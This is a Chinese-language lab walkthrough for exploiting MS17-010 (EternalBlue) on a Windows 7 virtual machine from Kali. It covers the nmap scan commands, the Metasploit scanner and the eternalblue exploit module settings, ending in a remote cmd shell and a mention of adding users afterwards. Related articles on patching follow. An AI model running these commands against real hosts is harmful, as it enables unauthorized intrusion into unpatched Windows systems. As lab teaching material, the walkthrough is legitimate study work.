使用ms17-010对win7进行渗透(传说中的永恒之蓝)

 

ms17-010

本实验在虚拟机环境下进行!

准备虚拟机两台:

Kali

win7 64位 (要将防火墙关闭)

  1. 先看看两台机器的ip地址是多少

kali的ip是 192.168.0.102

win7的ip是192.168.0.101

  1. 接着进行端口扫描

使用kali的nmap工具进行扫描,在kali终端输入nmap –sS –sV –Pn 192.168.0.101即可进行扫描,-sS 是半开放扫描,比普通扫描要快,-sV是版本检测,-Pn是不对目标主机进行存活性判断,直接扫描,注意要把win7的防火墙关闭了,不然会被拦截

得到结果如下

不同的机子可能扫出来的结果不一样,但我们只需要看445端口开放了即可

  1. 把msfconsole开启

Kali终端输入msfconsole,使用工具msfconsole

msfconsole的启动图像每次都不一样。。。图像不一样不用担心

  1. 先使用auxiliary/scanner/smb/smb_ms17_010这个模块进行漏洞的分析,看看这个445端口是否能被入侵

先show options查看这个模块的选项,在required那列中,yes的是必填的,no是选填的,默认帮我们已经写好了大部分的参数,但我们还是要手动设置一下RHOSTS的参数,即指定的主机ip,这里我们写被攻击的win7的ip

set RHOSTS 192.168.0.101

接着输入run执行探测

我们看到红线的这一行,他说这个主机很有可能具有ms17-010的漏洞

这是就基本可以确认,ms17-010可以入侵该win7

  1. 使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

使用这个模块,我们show targets看一下这个模块适用于哪些系统的主机

可以看到,win7和server 2008 r2都适用

我们show options来看看有哪些选项

可以看出,我们只需要设置RHOST,即要攻击的主机ip即可

set RHOST 192.168.0.101

接着run执行攻击

程序就会运行,当看到WIN的时候,说明我们已经渗透进win7里面去了,按下回车出现了win7的cmd,这是已经是渗透成功了。但有时候不一定会成功,会返回FaiL,说明这个系统打了补丁,这个漏洞已经没有威力了。

之后就可以建用户开端口了,既然已经渗透成功了。就不描述了。

实验完成

相关阅读

永恒之蓝漏洞自查-MS17010漏洞自查与修复

MS17010漏洞时间线回溯 2017-03-12,微软发布MS17-010补丁包 2017-03-14,微软发布《MS17-010:Windows SMB 服务器安全更新说明》 htt

永恒之蓝 MS17-010漏洞复现

永恒之蓝 MS17-010漏洞复现 文章目录永恒之蓝 MS17-010漏洞复现一:漏洞原理1:简介2:漏洞原理代码详解二:漏洞复现1:信息收集2:尝试攻击1

继勒索病毒“永恒之蓝”445端口被封之后,在公网实现smb

背景 在最近项目中需要使用到windows smb文件共享,并且该项目过程不允许重启系统,其使用到的TCP连接端口为445,该项目测试环境一直处

永恒之蓝补丁

国家网络与信息安全信息通报中心紧急通报:2017年5月12日20时左右,新型“蠕虫”式勒索病毒爆发,目前已有100多个国家和地区的数万台电

发表评论